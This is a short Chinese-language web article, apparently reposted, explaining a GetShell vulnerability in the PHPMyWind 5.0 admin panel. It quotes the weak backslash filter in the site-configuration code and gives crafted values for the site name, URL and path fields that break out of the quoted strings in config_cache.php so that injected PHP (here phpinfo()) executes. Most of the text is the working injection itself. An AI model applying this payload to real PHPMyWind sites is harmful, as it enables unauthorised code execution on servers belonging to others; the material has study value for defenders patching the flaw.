phpmywind 5.0 后台GetShell漏洞利用 - 网站安全 - 自学

admin/web_congif.php 的过滤代码如下。

//强制去掉 ' //强制去掉最后一位 / $vartmp = str_replace("'",'',$row['varvalue']); if(substr($vartmp, -1) == '\\') { $vartmp = substr($vartmp,1,-1); }

只过滤了最后一位的反斜杠，只需要加两个反斜杠就可以了·····

首先修改网站配置信息

config_cache.php中会变成这样

$ cfg_webname = '的网站\';

$cfg_weburl = ';/*http://127.0.0.1'; $cfg_webpath = '*/phpinfo();#'; $cfg_author = ''; php代码就会被执行了。

声明：本文来自网络，不代表【好得很程序员自学网】立场，转载请注明出处：http://www.haodehen.cn/did15352

更新时间：2022-09-13 阅读：79次